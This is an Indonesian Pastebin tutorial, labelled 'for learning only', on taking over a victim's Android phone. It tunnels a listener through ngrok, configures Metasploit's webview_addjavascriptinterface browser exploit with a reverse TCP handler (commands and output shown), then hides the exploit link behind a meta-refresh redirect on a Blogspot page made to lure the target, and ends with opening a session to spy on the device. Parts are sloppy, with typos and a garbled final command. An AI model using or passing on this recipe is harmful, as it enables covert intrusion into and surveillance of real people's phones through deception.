Advertisement
vendetta25

METASPLOIT MENGGUNAKAN REDIRECT LINK IP FORWARDING

Jul 23rd, 2020
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.41 KB | None | 0 0
  1. Ini hanya untuk pembelajaran saja, tidak untuk kegiatan ilegal
  2. Author : David Paliwan, S.Kom
  3. ____________________
  4. | |
  5. | studi kasus |
  6. | |
  7. --------------------
  8.  
  9. mengakses perangkat android atau hp menggunakan teknik exploitasi direct link (masking)
  10. ===========================/ /=========================
  11.  
  12. ==/ step 1 /==
  13. membuat forwarding ip public, sehingga dapat menjangkau akses beda jaringan
  14. ---------------------------------------------------------------------------
  15. download dan install ngrok
  16. https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
  17. unzip /path/to/ngrok.zip
  18. ---------------------------------------------------------------------------
  19. ./ngrok authtoken xxxxxxxxxxxxxxxxxxxxxxxxx
  20. ------------------------------------------------
  21. ./ngrok http 80
  22. ---------------------
  23. setelah itu secara otomatis muncul tampilan Session Status.
  24. 0.tcp.ngrok.io adalah LHOST
  25. dan pada menu web interface terdapat port yang digunakan sebagai LPORT
  26. membuat akses ke perangkat target
  27. ----------------------------------
  28. pada command shel/terminal, ketikkan
  29. services postgresql start
  30. ---------------------------
  31.  
  32. ==/ step 2 /===MEMBUAT BACKDOOR APK===============================================
  33. msfconsole
  34. -------------
  35. msf > use exploit/android/browser/webview_addjavascriptinterface
  36. ------------------------------------------------------------------
  37. msf exploit(android/browser/webview_addjavascriptinterface) > set SRVHOST 0.tcp.ngrok.io
  38. -----------------------------------------------------------------------------------------
  39. msf exploit(android/browser/webview_addjavascriptinterface) > set URIPATH /
  40. -----------------------------------------------------------------------------
  41. msf exploit(android/browser/webview_addjavascriptinterface) > set LHOST 0.tcp.ngok.io
  42. --------------------------------------------------------------------------------------
  43. msf exploit(android/browser/webview_addjavascriptinterface) > set LPORT 4444
  44. catatan : LPORT yang digunakan adalah LPORT yang dilihat tadi pada session status
  45. --------------------------------------------------------------------------------------------
  46. msf exploit🌜️android/browser/webview_addjavascriptinterface🌛️ > set VERBOSE true
  47. -------------------------------------------------------------------------------
  48. msf exploit🌜️android/browser/webview_addjavascriptinterface🌛️ > set ReverseListenerBindAddress 0.tcp.ngrok.io
  49. ------------------------------------------------------------------------------------------------------------
  50. msf exploit🌜️android/browser/webview_addjavascriptinterface🌛️ > set ReverseListenerBindPort 4444
  51. -----------------------------------------------------------------------------------------------
  52. msf exploit(android/browser/webview_addjavascriptinterface) > run
  53. ✅️ Exploit running as background job 0.
  54. ✅️ Started reverse TCP handler on 0.tcp.ngrok.io:4444
  55. ✅️ Using URL: http://0.tcp.ngrok.io:8080
  56. ✅️ Server started.
  57. msf exploit(android/browser/webview_addjavascriptinterface)>
  58. catatan : http://0.tcp.ngrok.io:8080 adalah link untuk menyerang target
  59. ------------------------------------------------------------------------
  60.  
  61.  
  62.  
  63. ==/ step 3 /=======MENYAMARKAN LINK AGAR TARGET YAKIN=====================================
  64. menyediakan blogspot.com sebagai situs hosting link redirect
  65. masuk ke tema blogger kemudian klik tombol edit_html untuk menempatkan kode redirect link.
  66. setelah masuk tapilan kode html, cari kode <head> dan tempatkan kode berikut dibawahnya.
  67. <meta content=0;url=http://0.tcp.ngrok.io:8080 http-equiv=refresh>
  68. setelah itu, silahkan kreasikan tampilan blog anda agar menarik perhatian pengunjung.
  69. -------------------------------------------------------------------------------------
  70.  
  71. kemudian copy alamat web blog anda contoh kopihitam.blogspot.com kemudian kirimkan ke target.
  72. setelah target merespon atau mengklik link tersebut maka secara otomatis diarahkan ke link exploitasi.
  73. handshake atau jaringan yang terhubung akan terlihat di shell terminal.
  74. sementara proses berjalan, anda mengetikkan dibawah daftar proses >> session -i
  75. setelah muncul ACTIVE SESSION ketikkan perintah seperti dibawah ini
  76. msf exploit android/browser/webview_addjavascriptinterface > expl0it
  77. ----------------------------------------------------------------------
  78.  
  79. akan berlangsung proses exploitasi resource perangkat.
  80. setelah selesai proses, silahkan masukkan perintah untuk mengintip target.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement